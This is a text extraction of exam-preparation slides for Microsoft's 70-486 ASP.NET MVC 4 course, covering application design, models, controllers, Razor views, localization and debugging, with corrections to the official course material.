MCSD Web Applications Asp Net Courseware PDF
Uploaded by
Javier Garcia RamosMCSD Web Applications Asp Net Courseware PDF
Uploaded by
Javier Garcia RamosMicrosoft
MCSD: 70-486: Developing
ASP.NET MVC 4 Web
Applications Courseware
Version 1.1
1. 1
Module 1
Exploring ASP.NET MVC 4
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
1. 2
70-486 Exam Guide to Ratio of Questions
Design and
implement
security
Design the
application
architecture
Troubleshoot
and debug web
applications
Design the
user
experience
Develop the
user interface
Developing ASP.NET MVC 4 Web Applications
http://www.microsoft.com/learning/en/us/exam.aspx?ID=70-486
June 2013
155 minutes in total
55 questions in total
31 in main section
3 case studies
(6, 8, 10 questions)
Sep 2013 to Mar 2014
155 minutes in total
45 questions in total
22 in main section
3 case studies
(6, 7, 10 questions)
Time not an issue
Just as much configuration
and architecture as code
Official exam preparation guide does
not give percentages for each section
Microsoft Exam 70-486 Study Guide
http://www.bloggedbychris.com/2012/11/06/microsoft-exam-70-486-study-guide/
1. 3
Estimate of Number of Exam Questions per Module
Module
Qs
1: Exploring ASP.NET MVC 4 & 2: Designing ASP.NET MVC 4 Web Applications
3: Developing ASP.NET MVC 4 Models
4: Developing ASP.NET MVC 4 Controllers
5: Developing ASP.NET MVC 4 Views
6: Testing and Debugging ASP.NET MVC 4 Web Applications
7: Structuring ASP.NET MVC 4 Web Applications
8: Applying Styles to ASP.NET MVC 4 Web Applications
9: Building Responsive Pages in ASP.NET MVC 4 Web Applications
10: Using JavaScript and jQuery for Responsive MVC 4 Web Applications
11: Controlling Access to ASP.NET MVC 4 Web Applications
12: Building a Resilient ASP.NET MVC 4 Web Application
13: Using Windows Azure Web Services in ASP.NET MVC 4 Web Applications
14: Implementing Web APIs in ASP.NET MVC 4 Web Applications
15: Handling Requests in ASP.NET MVC 4 Web Applications
16: Deploying ASP.NET MVC 4 Web Applications
Total questions in exam
45
1. 4
Labs
Follow the instructions at bottom of page 1-27 (position 3, 11014)
Allow NuGet to download missing packages during build
Database for labs 3 to 16 (e.g. position 5, 9295)
The labs tell you to use a Windows Azure SQL Database
Use this server in the connection string instead
Data Source=(localdb)\v11.0
Lab 1: Web Sites are different from Projects
1. 5
Lab 3 (position 5, 7923)
Use the Basic project template NOT the
Empty project template so that you get
Bundle configuration
jQuery libraries for the client-side validation
Shared views for layout
1. 6
Lab 3 (position 5, 8970)
Installing EntityFramework NuGet package
The latest NuGet package for EntityFramework is 6.0.1
Scaffolding in Visual Studio 2012 RTM is not compatible with it!
To install an older version, use the Package Manager Console
install-package EntityFramework version 5.0.0.0
1. 7
Notes
The 70-486 exam is the hardest because it could ask a
question about almost any technology
ADO.NET, Entity Framework, LINQ, JavaScript, jQuery, CSS3,
WCF, Web API, Windows Azure, web architecture, Microsoft
Excel features, and so on
BUT the core of the exam is about ASP.NET MVC 4
In ASP.NET ~ (tilde) means root of web application
For Real-World Prototyping/Intranets (not on exam)
1. 8
ASP.NET Dynamic Data Entities Web Application
An old technology based on Web Forms for building
intranet applications as a client to a database
ASP.NET Dynamic Data Entities Web Application
Add an ADO.NET Entity Data Model
Delete the two .tt files (these create a class that derives from
DbContext that is not compatible with Dynamic Data)
Set Code Generation Strategy to Default (this creates a class
that dervices from ObjectContext that is compatible)
In Global.asax, in RegisterRoutes method, uncomment and
modify the statement to register your ObjectContext class and
scaffold all tables
DefaultModel.RegisterContext(typeof(NorthwindEntities),
new ContextConfiguration() { ScaffoldAllTables = true });
Run the web application!
2. 1
Module 2
Designing ASP.NET MVC 4
Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Designing ASP.NET MVC 4 Web Applications
2. 2
Contents
Topic
Slide
MVC Architecture
Configuration
Intrinsic Objects
.axd Files
10
Internationalization
11
Future Reading
18
Exam Topic: Plan the application layers
Plan data access
Plan for separation of concerns
Appropriate use of models, views, and controllers
Choose between client-side and server side processing
Design for scalability
Exam Topic: Plan and implement globalization and localization
Plan a localization strategy
Create and apply resources to UI including JavaScript resources
Set cultures
Create satellite resource assemblies
2. 3
MVC
Architecture
http://www.contoso.com/blog/edit/16
1
9
Data Repository is a faade
often implemented as a service
RouteTable
2
Controller
GetBlog(int)
Action1
Action
Result
Model
View
Domain Model
GetBlogs()
3
5
UpdateBlog
(Blog)
partial
classes and
metadata
ViewBag
ViewData
TempData2
CSDL
+ .cs
Entity
Data Model
MSL
SSDL
Data Mapper pattern
SQL Server
7
Partial View
1
2
Uses ModelBinders to map incoming parameters
Uses Session state to pass data beyond current request
2. 4
Configuration
Web Configuration Hierarchy
Visual Studio
Or Web Site
IIS
\Windows\Microsoft.NET\
Framework64\v4.0.30319\Config
<system.web> <!-- ASP.NET -->
<system.webServer> <!-- IIS -->
IIS 7 or later is at: \Windows\System32\inetsrv\config\ApplicationHost.config
Configuration
2. 5
External Configuration Sources
A section can load settings from an external file
<configuration>
<pages enableSessionState="false">
<system.web>
<namespaces>
<compilation debug="true">
<pages configSource="pages.config" />
<globalization culture="auto" />
Why?
File-access security and permissions can be used to restrict
access to sections of configuration settings
Settings that are not used during application initialization (e.g.
connection strings) can be modified and reloaded without
requiring an application restart by using this attribute
<configSections>
<section name="pages" ... restartOnExternalChanges="false" />
Intrinsic Objects
2. 6
Using the ASP.NET Intrinsic Objects
HttpContext properties
Application, Cache, Session (dictionaries for storing state
beyond current request, either shared or only for user session)
Items (dictionary for storing state during current request)
TimeStamp, User (information about current request)
Request (everything sent from the browser e.g. cookies)
Response (everything sent to the browser e.g. cookies)
// inside a Controller
HttpContext.Cache.Clear(); // some need HttpContext prefix ...
Debug.WriteLine(Request.Browser.IsMobileDevice); // ... some dont
// inside a View or anywhere else
Debug.WriteLine(HttpContext.Current.Request.Browser.IsMobileDevice);
HttpContext Class
http://msdn.microsoft.com/en-us/library/system.web.httpcontext.aspx
Intrinsic Objects
2. 7
HttpContext and Some of Its Properties
Intrinsic Objects
2. 8
Using the ASP.NET Intrinsic Objects
Inside a Controller all the following are directly
available
HttpContext
Items: good for sharing state through pipeline e.g. HTTP
modules and HTTP handlers
Request
HTTP request as sent from the client (request headers, cookies,
client certificate, form and query string parameters, and so on)
Response
HTTP response sent from the server to the client (response
headers, cookies, and so on)
Session (store state for user session)
Intrinsic Objects
2. 9
Using the ASP.NET Intrinsic Objects on HttpContext
Even inside a Controller all the following need the
HttpContext prefix
HttpContext.Cache
Shared cache for a Web application
HttpContext.Application
Store shared state at application level
HttpContext.ApplicationInstance
Defines the methods, properties, and events that are common
to all application objects in an ASP.NET application
HttpApplication is the base class for applications that are
defined by the user in the Global.asax file
.axd Files
2. 10
What are They?
There are several virtual features of ASP.NET that use
the .axd file extension; they are not real files
WebResource.axd and ScriptResource.axd: load resources such
as JavaScript and JPEGs that have been embedded in
assemblies; an alternative is the newer bundling and
minification feature
Trace.axd: view the trace log for the last n requests; most
useful for Web Forms pages because they show ViewState and
page events
If we dont explicitly warn MVC not to route anything
with .axd in the path then it would try to find a
controller named Trace.axdController!
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
Internationalization
2. 11
What Is It?
Internationalization involves
Localizing the user interface (load any UI text from resource
assemblies) by setting the UICulture property of the thread
Globalizing the code (e.g. DateTime.Now.ToLongDateString())
by setting the Culture property of the thread
ISO defines codes for language-region
en-US: English (United States)
en-GB: English (United Kingdom)
NOT en-UK: MOC is wrong on page 2-13
fr-FR: French (France)
fr-CA: French (Canada)
uiCulture code can be neutral (language only)
ISO 3166-1-alpha-2 code
http://www.iso.org/iso/country_codes/iso_3166_code_lists/country_names_and_code_elements.htm
Internationalization
2. 12
Browser Requests Language Preference
Browser sends its preferred language(s) in header
Accept-Language = "Accept-Language" ":"
1#( language-range [ ";" "q" "=" qvalue ] )
language-range = ( ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*" )
Each language-range MAY be given an associated quality value
which represents an estimate of the users preference for the
languages specified by that range. The quality value defaults to
"q=1". For example,
Accept-Language: da, en-gb;q=0.8, en;q=0.7
would mean: I prefer Danish, but will accept British English
and other types of English.
14 Header Field Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
Internationalization
2. 13
Internationalizing MVC
There are two localization strategies to incorporate
different languages and cultures in ASP.NET MVC
By dynamically loading resource strings in all views
By using different set of views for every language and locale
Create a class library with .resx files and load in views
ASP.NET MVC 3 Internationalization
http://afana.me/post/aspnet-mvc-internationalization.aspx
Internationalization
2. 14
RESX Files, Satellite Assemblies, and Thread Culture
Visual Studio assigns the ResXFileCodeGenerator
custom tool to .resx files (change to Public version)
This tool embeds the default resources in the main
assembly in the bin folder and creates sub-folders for
other languages and cultures
/bin/MvcApp1.dll: application code and default resources
/bin/fr/MvcApp1.resources.dll: French resources
/bin/fr-CA/MvcApp1.resources.dll: French-Canadian resources
Set globalization so that the thread executing the view
has correct Culture and UICulture properties set based
on browsers Accept-Language header
<globalization uiCulture="auto" culture="auto"/>
2. 15
Internationalization
Loading from Resource Files
When you create resource files (.resx) a class is created
for you for each one and will automatically load the
localized string
/Models/SharedResources.resx (Default - Hello)
/Models/SharedResources.fr.resx (French Bonjour)
/Models/SharedResources.fr-CA.resx (French Canadian
Bonjour Quebec)
In a View
@using MvcSite.Models
In Web.config
in Views folder
@SharedResources.Welcome
<pages>
<namespaces>
<add namespace="MvcSite.Models" />
Resx Files In App_GlobalResources
http://odetocode.com/Blogs/scott/archive/2009/07/16/resource-files-and-asp-net-mvc-projects.aspx
Internationalization
2. 16
Right-to-Left Languages
When writing web pages in Web Forms or MVC, the best
way to make text flow from right to left is to use the
dir (direction) attribute
When the value is set on the html tag the page displays
as a right-to-left page and a vertical scrollbar appears
on the left side
<html dir="rtl">
When the value is set on the body tag, frames and
captions do not inherit right-to-left direction
To override for individual controls, set dir for each
control to ltr
<table dir="ltr">
2. 17
Internationalization
Common Verbs in English, Spanish, French
en
es
fr
en
es
fr
accept
aceptar
accepter
open
abrir
ouvrir
break
romper
casser
close/shut
cerrar
fermer
buy
comprar
acheter
pay
pagar
payer
cancel
cancelar
annuler
put
poner
poser
change
cambiar
changer
read
leer
lire
count
contar
compter
reply
responder
rpondre
cut
cortar
couper
send
enviar
envoyer
draw
dibujar
dessiner
start/begin
comenzar
commencer
explain
explicar
expliquer
translate
traducir
traduire
fill
llenar
remplir
turn off
apagar
teindre
find
encontrar
trouver
turn on
encender
allumer
finish
terminar
terminer
use
utilizar/usar
utiliser
go
ir
aller
wait
esperar
attendre
make/do
hacer
faire
write
escribir
crire
Future Reading
2. 18
ASP.NET MVC
Official Site for ASP.NET MVC
Tutorials, videos, samples, forum, books, open source
http://asp.net/mvc
Free MVC 4 Video Training from Pluralsight
http://www.asp.net/mvc/videos/pluralsight-buildingapplications-with-aspnet-mvc-4
Windows Azure Conference
http://channel9.msdn.com/Events/WindowsAzure/AzureConf2012
Blogs
Phil Haack, http://haacked.com/
Scott Hanselman, http://www.hanselman.com/
3. 1
Module 3
Developing ASP.NET MVC 4
Models
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Developing ASP.NET MVC 4 Models
3. 2
Contents
Exam Topic: Design and implement MVC controllers and actions
Implement model binding
3. 3
MOC Errata
Page 03-8 (position 5, 2677)
The MOC says
[AttributeUsage(AttributeTargets.Field)]
It should have said
[AttributeUsage(
AttributeTargets.Field | AttributeTargets.Property)]
Page 03-14 (position 5, 4588)
To define a SqlClient connection string they should use (but
dont have to due to backwards compatibility)
Data Source instead of server
Initial Catalog instead of database
Integrated Security instead of trusted_connection
Persist Security Info instead of PersistSecurityInfo
3. 4
MVC Models
Metadata Annotations
System.ComponentModel
[Display(Name = "First Name")]
[DisplayName("First Name")]: used by label
(deprecateduse Display instead because it can be localized*)
[ReadOnly(true)]: make property read-only
System.Web.Mvc
[HiddenInput] public Guid ID { get; set; }
[HiddenInput]: invisible to user but posted with form
System.ComponentModel.DataAnnotations
[DisplayFormat(HtmlEncode = false, NullDisplayText = "Unpaid",
DataFormatString = "{0:c}", ConvertEmptyStringToNull = true,
ApplyFormatInEditMode = false)]
// will not be included at all
public decimal Salary { get; set; }
[ScaffoldColumn(false)]
public decimal Salary { get; set; }
*DisplayAttribute.ResourceType Property
http://msdn.microsoft.com/en-us/library/system.componentmodel.dataannotations.displayattribute.resourcetype(v=vs.110).aspx
3. 5
MVC Models
Validation Metadata Annotations
ValidationAttribute is abstract base class
ErrorMessage (non-localized string)
ErrorMessageResourceType (e.g. Shared)
ErrorMessageResourceName (e.g. HW)
Derived classes
DataType enumeration
Custom
Text
[DataType(DateType.Date)]
DateTime
Html
[Range(18, 65)]
Date
MultilineText
[RegularExpression(@"\d+")]
Time
EmailAddress
[Required(AllowEmptyStrings=false)]
Duration
Password
[StringLength(50)]
PhoneNumber
Url
Currency
ImageUrl
[StringLength(14, MinimumLength = 6,
ErrorMessage = "Password must be between 6 and 14 characters.")]
public string Password { get; set; }
MVC Models
3. 6
Custom Validation
Two techniques for custom validation
CustomValidationAttribute
Inherit from ValidationAttribute (see next slide)
Create a class with a static method
public class MyValidator {
public static bool CheckPassword(object value) {
return true; // if value is valid
Apply attribute to a property on your model
[CustomValidation(typeof(MyValidator), "CheckPassword",
ErrorMessage = "Between 6 and 14 characters.")]
public string Password { get; set; }
MVC Models
3. 7
Custom Validation
[AttributeUsage(AttributeTargets.Field | AttributeTargets.Property,
AllowMultiple = false)]
public class ValidatePasswordLengthAttribute : ValidationAttribute
{ // public so they can be set with named parameters
public int MinimumCharacters { get; set; }
public int MaximumCharacters { get; set; }
public ValidatePasswordLengthAttribute(int minChars = 6) : base()
{
MinimumCharacters = minChars;
}
public override bool IsValid(object value)
{
var s = (value as string);
return ((s != null) && (s.Length >= MinimumCharacters)
&& (s.Length <= MaximumCharacters));
}
}
[ValidatePasswordLength(8, MaximumCharacters = 12)]
public string Password { get; set; }
MVC Models
3. 8
Using a Partial Class to Apply Metadata
If you auto-generate your model using a tool like an
Entity Data Model then you cannot apply attributes to
the code because you will loose them next time it regenerates so you must use a partial class with the
MetadataType attribute
[MetadataType(typeof(BlogMetadata))]
public partial class Blog
{
public class BlogMetadata
{ // only need to include properties that need attributes
[Required(ErrorMessage = "Title is required")]
public object Title { get; set; }
[Required(ErrorMessage = "Blog is required")]
public object Blog { get; set; }
}
}
MVC Models
3. 9
Model Binders
There are five model binders built-in to ASP.NET MVC
DefaultModelBinder (most commonly used)
HttpPostedFileBaseModelBinder
ByteArrayModelBinder
LinqBinaryModelBinder
CancellationTokenModelBinder
MVC Models
3. 10
DefaultModelBinder
Maps a browser request to a data object
Provides a concrete implementation of a model binder
Maps the following types to a browser request
Primitive types, such as String, Double, Decimal, or DateTime
Model classes, such as Person, Address, or Product
Collections, such as ICollection<T>, IList<T>, or
IDictionary<TKey, TValue>
MVC Models
3. 11
Custom Model Binders
Implement System.Web.Mvc.IModelBinder
using System.Web.Mvc;
public class FullnameModelBinder : IModelBinder {
public object BindModel(ControllerContext cc, ModelBindingContext mbc) {
ModelBindingContext has ValueProvider to get parameters
var fullName = mbc.ValueProvider.GetValue("fullname");
dynamic parts = fullName.RawValue.ToString().Split(' ');
string firstName = parts[0];
string lastName = parts[1];
Splitting DateTime - Unit Testing ASP.NET MVC Custom Model Binders
http://www.hanselman.com/blog/SplittingDateTimeUnitTestingASPNETMVCCustomModelBinders.aspx
6 Tips for ASP.NET MVC Model Binding
http://odetocode.com/blogs/scott/archive/2009/04/27/6-tips-for-asp-net-mvc-model-binding.aspx
MVC Models
3. 12
Registering and Applying a Model Binder
In Global.asax
To replace the default model binder
ModelBinders.Binders.DefaultBinder = new FirebrandModelBinder();
To add or insert a new model builder for a specific type before
any existing model binders for that type
public ActionResult Edit(Person p) {
ModelBinders.Binders.Add(
typeof(Person), new PersonBinder());
In a controller
To apply to a specific action argument
public ActionResult Edit(
[ModelBinder(typeof(FirstNameBinder))] string firstName,
[ModelBinder(typeof(AgeBinder))] int age) {
The Features and Foibles of ASP.NET MVC Model Binding
http://msdn.microsoft.com/en-us/magazine/hh781022.aspx
Entity Framework
3. 13
Database Initializers
System.Data.Entity has several initializers
CreateDatabaseIfNotExists<TContext>: will recreate and
optionally re-seed the database only if the database doesnt
exist
DropCreateDatabaseAlways<TContext>: will always recreate
and optionally re-seed the database the first time that a
context is used in the app domain
DropCreateDatabaseIfModelChanges<TContext>: will delete,
recreate, and optionally re-seed the database only if the model
has changed since the database was created
MigrateDatabaseToLatestVersion<TContext,
TMigrationsConfiguration>: will use Code First Migrations to
update the database to the latest version
For all, create a derived class and override the Seed method
Database.SetInitializer<TContext> Method
http://msdn.microsoft.com/en-us/library/gg679461(v=vs.113).aspx
Windows Azure SQL Database
3. 14
Create the Database
Windows Azure SQL Database
3. 15
Wait for Database to be Created
Windows Azure SQL Database
3. 16
Manage allowed IP addresses
Click ADD TO THE ALLOWED IP ADDRESSES
Windows Azure SQL Database
3. 17
Get the Connection String
Windows Azure SQL Database
3. 18
Manage the Database Structure and Data
4. 1
Module 4
Developing ASP.NET MVC 4
Controllers
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
4. 2
Developing ASP.NET MVC 4 Controllers
Contents
Topic
Page 04-4
Slide
Action Filters
Passing Data to a View
ActionResult
The MOC says
Photo firstPhoto = context.Photos.ToList()[0];
It should have said
Photo firstPhoto = context.Photos.FirstOrDefault();
Exam Topic: Design and implement MVC controllers and actions
Apply authorization attributes and global filters
Implement action behaviors
Implement action results
Exam Topic: Control application behavior by using MVC extensibility points
Implement MVC filters and controller factories
4. 3
Action Filters
Types of Action Filter
Action filters are custom attributes that provide a
declarative means to add pre-action and post-action
behavior to controller action methods
There are built-in filters like [Authorize], [AllowAnonymous],
[HandleError], and you can create custom ones
Authorization filters Make security decisions about
whether to execute an action method
Action filters Wrap the action method execution
Result filters Wrap the ActionResult
Exception Filters Execute if there is an unhandled
exception thrown in the action method
4. 4
Action Filters
When Do They Trigger?
Authorization filter
Before an action is executed
Action filter
OnActionExecuting
OnActionExecuted
Result filter
OnResultExecuting
OnResultExecuted
[MyCustomActionFilter]
[MyCustomResultFilter]
public ActionResult Index()
{
// fetch model
return View(model);
}
// response is returned
Exception filter
Only when an unhandled exception happens
4. 5
Action Filters
Implement a Custom Filter
Inherit from ActionFilterAttribute, then override any of
the four methods you want to use
public class MyCustomActionFilter : ActionFilterAttribute
{
public overrides OnActionExecuting( // before action executes
public overrides OnActionExecuted( // after action executes
public overrides OnResultExecuting( // before results returned
public overrides OnResultExecuted( // after results returned
ActionFilterAttribute implements
IActionFilter: OnActionExecuting, OnActionExecuted
IResultFilter: OnResultExecuting, OnResultExecuted
ActionFilterAttribute inherits from FilterAttribute
Warning!
using System.Web.Mvc;
System.Web.Mvc NOT System.Web.Http.Filters
Passing Data to a View
4. 6
ViewBag
ViewData is a dictionary of objects that is derived from
ViewDataDictionary and accessible using strings as keys
ViewData["Message"] = "Hello world!";
ViewBag is a dynamic property that takes advantage of
the new dynamic features in C# 4.0 and later
ViewBag.Message = "Hello world!";
TempData is a dictionary that stores values in Session
(by default*) and persists until the next request
Anything you put into TempData is discarded after the next
request completes, for example, a redirect
What is ViewData, ViewBag and TempData?
http://www.codeproject.com/Articles/476967/WhatplusisplusViewData-2cplusViewBagplusandplusTem
*ASP.NET MVC: Do You Know Where Your TempData Is?
http://www.gregshackles.com/2010/07/asp-net-mvc-do-you-know-where-your-tempdata-is/
4. 7
ActionResult
Derived Types and Helper Methods of Controller
Derived Type
Description
ContentResult
Returns a user-defined content type
public ActionResult GetPlainText() {
return Content("Hello world");
EmptyResult
Returns a null result
FileResult
Returns a binary file
JavaScriptResult
Returns JavaScript
JsonResult
Returns a serialized Json object
public ActionResult GetJsonObject() {
return Json(new { firstName="Bob", age=42 },
JsonRequestBehavior.AllowGet);
PartialViewResult
Renders a partial view
RedirectResult
Redirects to another action method by using its URL
RedirectToRouteResult
Redirects to another action method
ViewResult
Renders a .cshtml or .aspx view
return View();
5. 1
Module 5
Developing ASP.NET MVC 4
Views
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Developing ASP.NET MVC 4 Views
5. 2
Contents
Exam Topic: Compose the UI layout of an application
Implement partials for reuse in different areas of the application
Design and implement pages by using Razor templates (Razor view engine)
Exam Topic: Plan for search engine optimization and accessibility
Use analytical tools to parse HTML
View and evaluate conceptual structure by using plugs-in for browsers
Write semantic markup (HTML5 and ARIA) for accessibility, for example, screen readers
C# Razor Syntax Quick Reference
http://haacked.com/archive/2011/01/06/razor-syntax-quick-reference.aspx
5. 3
MOC Errata
Page 05-32
Task 3: Complete the photo gallery partial view.
6. After the if statement, add a P element, and call the
@Html.DisplayFor helper to render the words Created By:
followed by the value of the item.UserName property.
7. After the UserName display controls, add a P element, and call
the @Html.DisplayFor helper to render the words Created On:
followed by the value of the item.CreatedDate property.
It should say DisplayNameFor
MVC Views
5. 4
Highlighting Razor Code
Make it easier to spot razor code
Menu: Tools-Options
Environment-Fonts and Colors
Display items: Razor Code
Item background: choose a more visible colour than light grey
5. 5
MVC Views
What is the Model?
In a strongly-typed view, the Model object will be of
the type specified by @model directive
Which should match the type of object passed to View() helper
@model MvcApp.Models.Blog
@Model.Title
Html helper methods take a lambda which allows you
to declare a local variable name for the Model
Visual Studio uses model for the name by default
Inside for loops, lambda variables (like x below) still refer to
the model for the view; we must use the loop variable instead
@model MvcApp.Models.Customer
@Html.DisplayFor(model => model.CompanyName) has @Model.Orders.Count orders.
@foreach (var order in Model.Orders)
@Html.DisplayFor(x => order.OrderID)
MVC Views
5. 6
Feature with Models in Views
When using DisplayNameFor with IEnumerable models,
the lambda local variable still uses a single instance
With DisplayFor, model is
IEnumerable<Customer>
With DisplayNameFor, model is
a single Customer
The lab views sometimes
use this feature to
simplify lambdas
With DisplayFor, we have to
use item, NOT modelItem
In DisplayNameFor, we can
use model
5. 7
MVC Views
Importing Namespaces into Views
For all views, edit Web.config in Views folder
<system.web.webPages.razor>
<pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Optimization"/>
<add namespace="System.Web.Routing" />
For a single view, add using directive at top of file
@using MvcApp.Models
@model Shipper
5. 8
MVC Views
Displayers and Editors
Visual Studio tools create code to output strings for
displaying or text boxes and validation for creating or
editing
<div>ProductID</div>
<div>@Model.ProductID</div>
@Html.LabelFor(m => m.ProductID)
@Html.TextBoxFor(m => m.ProductID)
@Html.ValidationMessageFor(m => m.ProductID)
You can change this to use DisplayFor and EditorFor
These can read the metadata in your model for hints for how to
output your data
[DisplayFormat(DataFormatString="{0:c}"]
public decimal Salary { get; set; }
@Html.DisplayFor(model => model.Salary)
@Html.EditorFor(model => model.Email)
5. 9
MVC Views
Defining Custom Displayers
By default, properties are rendered as strings
Order.OrderDate 08-02-2011 16:44
Customer.Email fred@test.com
Create a custom display by adding a partial view named
EmailDisplayer to DisplayTemplates under Shared or
specific view folder
<a href="mailto:@Model">@Model</a>
EmailDisplayer
To explicitly specify the view to use
@Html.DisplayFor(model => model.Email, "EmailDisplayer")
ASP.NET MVC Templates - http://bradwilson.typepad.com/blog/2009/10/aspnet-mvc-2-templates-part-1introduction.html/
MVC Views
5. 10
Defining Custom Editors
MVC Model
Associate a web user control with a property
[UIHint("RatingsDropDown")]
public string Rating { get; set; }
MVC View
Add the partial view (RatingsDropDown.cshtml) in EditorTemplates
@Html.DropDownList("", new SelectList(new [] {
"Excellent", "Good", "Average", "Poor" }, Model))
Generate the editor for the property
@Html.EditorFor(model => model.Rating)
5. 11
MVC Views
Html.RenderPartial (faster) and Html.Partial
Note
RenderPartial writes
directly to the response
stream so it is faster.
Partial returns a string
so it can be used in a
Razor expression.
Renders the specified partial view
@model Customer
<!-- details of a customer -->
<h2>Orders</h2>
@{ Html.RenderPartial("_ListOrders"); }
2
_ListOrders.cshtml
@Html.Partial("_ListOrders")
When a partial view is created it gets its own copy of the ViewBag
so if it changes the ViewBag then the parents copy is not affected
But changes to the Model are affected!
You can explicitly pass a subset of the parents Model
@{ Html.RenderPartial("_ListOrders", subsetOfModel); }
RenderPartialExtensions.RenderPartial Method - http://msdn.microsoft.com/enus/library/system.web.mvc.html.renderpartialextensions.renderpartial.aspx
5. 12
MVC Views
Html.ActionLink
Creates an anchor tag with a path defined by a route
that calls an action method on a controller
Text to show
Action name
Controller name (optional)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog", null,
new { @class = "cool", target = "_blank" })
Route values
HTML attributes
Would render this onto the HTML page
<a href="/Blog/ShowBlog" target="_blank" class="cool">Show Blog</a>
...and when clicked would call this action method
public class BlogController : Controller {
public ActionResult ShowBlog() {
5. 13
MVC Views
Html.Action and Html.RenderAction
Calls an action method on the controller and returns
the results as a string into the current view
@model Customer
<!-- details of a customer -->
<h2>Orders</h2>
@Html.Action("ListOrders", Model)
1
public class CustomerController : Controller
{
[ChildActionOnly]
public PartialViewResult ListOrders(Customer c)
{
List<Order> orders = GetOrders(c.CustomerID);
2
return PartialView("_ListOrders", orders);
@{ Html.RenderAction
("ListOrders", Model); }
Note
RenderAction returns
the results directly to
the response stream so
provides better
performance.
Useful if you need to get more data from the model
MVC Views
5. 14
ChildActionOnly Attribute
Designed for use with
Html.Action and Html.RenderAction
@Html.Action("GetMoreModelData")
These two methods can be used in a view to call back
to a controller action in order to get more model data
[ChildActionOnly]
public PartialViewResult GetMoreModelData()
An external call should not normally be allowed to
directly call these actions so we apply ChildActionOnly
But you cannot call an action with ChildActionOnly applied using
Ajax.ActionLink because it makes an external call so in this case
leave off the attribute
Using ChildActionOnly in MVC
http://stackoverflow.com/questions/10253769/using-childactiononly-in-mvc
MVC Views
5. 15
HTML5 Features for Accessibility
You can use HTML5 to improve accessibility
Give content elements descriptive names
Apply ARIA (Accessible Rich Internet Application) attributes
<!-- Rule 2A: "File" label via aria-labelledby -->
<li role="menuitem" aria-haspopup="true" aria-labelledby="fileLabel">
<span id="fileLabel">File</span>
<!-- Rule 2C: "New" label via Namefrom:contents -->
<li role="menuitem" aria-haspopup="false">New</li>
Use the new semantic markup elements appropriately, e.g.
article, aside, figcaption, figure, footer, header, hgroup,
mark, nav, section, time
Accessible Rich Internet Applications (WAI-ARIA) 1.0
http://www.w3.org/WAI/PF/aria/
HTML5 Part 1: Semantic Markup and Page Layout
http://blogs.msdn.com/b/jennifer/archive/2011/08/01/html5-part-1-semantic-markup-and-page-layout.aspx
6. 1
Module 6
Testing and Debugging ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Testing and Debugging ASP.NET MVC 4 Web Applications
6. 2
Contents
Topic
Slide
Error Handling
Debugging
Health Monitoring
Testing
13
System.Diagnostics 24
.Contracts
Exam Topic: Prevent and troubleshoot runtime issues
Troubleshoot performance, security, and errors
Implement tracing, logging (including using attributes
for logging), and debugging (including IntelliTrace)
Enforce conditions by using code contracts
Enable and configure health monitoring (including
Performance Monitor)
Exam Topic: Design an exception handling strategy
Handle exceptions across multiple layers
Display custom error pages using global.asax or creating
your own HTTPHandler or set web.config attributes
Handle first chance exceptions
Exam Topic: Test a web application
Create and run unit tests, for example, use the Assert
class, create mocks
Create and run web tests
Error Handling
6. 3
Defining Custom Errors
customErrors element can redirect unhandled .NET
exceptions and HTTP status code errors
<customErrors defaultRedirect="CustomErrorView"
mode="RemoteOnly" >
<error statusCode="404" redirect="Errors/Error404"/>
<!-- if using IE, switch off friendly errors to see this working -->
<error statusCode="500" redirect="Errors/Error500"/>
</customErrors>
Mode: Off (default), On, RemoteOnly
When Off, unhandled errors cause ASP.NET to generate an error
page that shows code including the line that caused the error
You can detect if it is on at runtime by using
HttpContext.IsCustomErrorEnabled
Error Handling
6. 4
Global Filters
Global filters are useful to set up global error handlers
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute
{
ExceptionType = typeof(DivideByZeroException),
View = "CustomException"
});
}
Exercise 1: Creating a Global Action Filter
http://msdn.microsoft.com/en-us/vs2010trainingcourse_aspnetmvcglobalanddynamicactionfilters_topic2.aspx
6. 5
Debugging
Configuring
Debugging for a web site is
controlled via two settings
Project Properties, Web, Debuggers,
ASP.NET (enabled by default)
Web.config (disabled by default)
<compilation debug="true" />
In Machine.config, if deployment is
set to retail then debug and trace
output is disabled and custom
errors are always on
<system.web>
<deployment retail="true" />
Debugging
6. 6
When Exceptions are Thrown
If you have written exception handling code but need to monitor
the internal state of your application when a CLR exception is
thrown, choose Debug-Exceptions and select the Thrown check box
Debugging
6. 7
Remote Sites
Visual Studio and IIS on different machines
\Program Files\Microsoft Visual Studio 10.0\Common7\IDE
\Remote Debugger\x86\msvsmon.exe
Run on the remote server prior to debugging (no need to install)
Msvsmon started a new server named user@machine
Administrative rights allow debugging under a different identity
Both machines must be in the same domain or workgroup
Remote debugging with Visual Studio 2010
http://www.codeproject.com/Articles/146838/Remote-debugging-with-Visual-Studio-2010
Debugging
6. 8
Client-Side Script
By default, client-side script debugging is disabled in
Internet Explorer
Unselect the box to enable debugging
6. 9
Health Monitoring
What Is It?
Events can be intercepted and recorded throughout the
lifetime of an application
Starting or ending a Web application
Successful and unsuccessful authentication attempts
ASP.NET errors
Custom application events
Events inherit from WebBaseEvent
Derived classes include: WebManagementEvent, WebAuditEvent,
WebRequestEvent, WebHeartBeatEvent, WebBaseErrorEvent,
WebErrorEvent, WebRequestErrorEvent, and so on
ASP.NET includes several event providers that listen to
those events (next slide)
6. 10
Health Monitoring
Event Providers
All inherit from abstract WebEventProvider class
Override ProcessEvent method to implement your own
EventLogWebEventProvider
Writes to a Windows event log
SqlWebEventProvider
Writes to SQL Server Express ASPNETDB in
App_Data folder by default
